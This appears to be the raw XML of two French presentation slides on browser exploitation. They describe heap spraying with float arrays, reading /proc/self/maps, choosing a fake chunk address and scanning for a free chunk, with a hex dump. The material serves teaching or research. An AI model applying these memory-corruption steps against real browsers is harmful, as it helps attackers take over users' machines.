              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99EF7E7F-AA7E-4898-8E06-85BD43637F69}"/>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23" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{915EE8F6-F51A-E70B-E8D2-737E8FABB703}"/>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Stratégie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178928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1966BDB-075D-C037-A3B8-194022F2EAE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA23E0AA-DEF1-C09C-0FB9-1BDDEA579BE2}"/>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C1AB5508-70AF-3231-D625-5A6D0BD6D1D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>spraying</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F65C6C0-5C49-4E14-9970-58C39E98D6D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366729" y="1262213"/>
            <a:ext cx="6719871" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On rempli la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (le tas) avec des tableaux de flottant 64 bits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D9BD993-8EA2-DE5F-C8A7-4E650D4F0F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3710074" y="2348283"/>
            <a:ext cx="2160240" cy="1356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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E522CBA-274A-6E97-F7D5-9EF150A59C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454450" y="2352820"/>
            <a:ext cx="629240" cy="1351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dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3896F6A1-57DE-DADB-301F-1727AB42169C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1863441" y="2352820"/>
            <a:ext cx="650683" cy="1351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a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{805C35F6-6945-75AB-AF96-C1F01A6C8657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2845978" y="2352820"/>
            <a:ext cx="554850" cy="1351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200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>heap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDE6E4F8-51EC-AC3A-B82C-5DC27D86B4B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6371158" y="2352820"/>
            <a:ext cx="2160240" cy="13472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br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>19 00 00 00 19 00 00 00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44DA0CAB-CCB1-D0F4-FEC7-B41227AA1A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5876422" y="2348283"/>
            <a:ext cx="494736" cy="135633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200" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>hole</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Connecteur droit avec flèche 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9240F41D-0403-AC02-C804-B9F586269E79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="0"/>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4790194" y="3704620"/>
            <a:ext cx="0" cy="2826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2A2791D-0788-5914-57F6-4107F0B082FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2845978" y="3987315"/>
            <a:ext cx="3888432" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7FFF0000 – 0x80000000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-p</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="ZoneTexte 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA335C59-7033-E8D1-11D6-A774F9187DD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4660047" y="1870259"/>
            <a:ext cx="2927486" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x80c00000 – 0x80c20000 r--p</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Connecteur droit avec flèche 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B42B28AA-C278-BEC3-43BF-093D364DD9A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="19" idx="2"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123790" y="2170341"/>
            <a:ext cx="0" cy="1779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A7D9B8E6-8CEC-EB8C-22AA-265075AEE48E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6041723" y="4343200"/>
            <a:ext cx="2819110" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x80c20000 – 0x80d00000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-p</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A0AD93-0C71-B0DF-179A-8CC36095AB9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3412316" y="2346015"/>
            <a:ext cx="286270" cy="1356336"/>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sz="1200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF6ED1FB-A383-4ABB-C76E-A0DCC467DBA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1083691" y="2352820"/>
            <a:ext cx="792088" cy="1351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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rodata</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD36B8C6-40CB-F910-7422-73CFBC6C2A65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2525612" y="2348283"/>
            <a:ext cx="308878" cy="1351800"/>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sz="1200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Connecteur droit avec flèche 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7592DFB-13B0-E7D1-11C4-B8648E8C4650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="21" idx="0"/>
            <a:endCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7451278" y="3700084"/>
            <a:ext cx="0" cy="64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Explosion : 8 points 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{656456BD-CA38-E5E0-CDEF-CB28A218199D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649870" y="2554138"/>
            <a:ext cx="432048" cy="448687"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">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2D8C79A8-BB0F-7317-9F4A-16BE743C3DCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403304" y="4458616"/>
            <a:ext cx="7813472" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Adresse de faux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> valide : 0x80c20108 =&gt; « %08%01%80 »</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="ZoneTexte 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{410D8A20-005F-B549-EBA8-44A119FC4F3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366729" y="1523676"/>
            <a:ext cx="7129446" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On retrouve les zones mémoires correspondantes via la lecture de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>/proc/self/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1"/>
              <a:t>maps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7BB8ECE-F7AF-7D80-3941-D82240C26842}"/>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r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0"/>
              <a:t>Navigateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C66A11BC-3650-44F1-4D85-6A3059F12998}"/>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3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>Stratégie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="903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8" grpId="0"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="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2F488E7-5FF6-03B6-FFB8-B8E95045FA97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BADD7A5-7A59-D7DD-5B5E-A843DF896716}"/>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B8EA785F-BAC9-C62B-AF3D-75574648596D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55ABDB2-7DD3-A470-3243-C661F45636A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366729" y="1262213"/>
            <a:ext cx="8015271" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On parcours le tableau de flottant jusqu’à trouver une entrée != </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5.30498947865e-313 ( 19 00 00 00 19 00 00 00)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On peut identifier le type des objets grâce à leur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB03C49E-B330-FD48-686F-A860A54372BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910275" y="2027413"/>
            <a:ext cx="7323449" cy="1962076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000: 19 00 00 00 19 00 00 00  90 63 2B 02 01 00 00 00  .........c+.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000010: 34 E9 14 01 00 00 00 00  D0 F3 C3 03 19 00 00 00  4...............</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000020: 19 00 00 00 19 00 00 00  19 00 00 00 19 00 00 00  ................</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000030: 19 00 00 00 19 00 00 00  B8 E0 12 02 01 00 00 00  ................</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
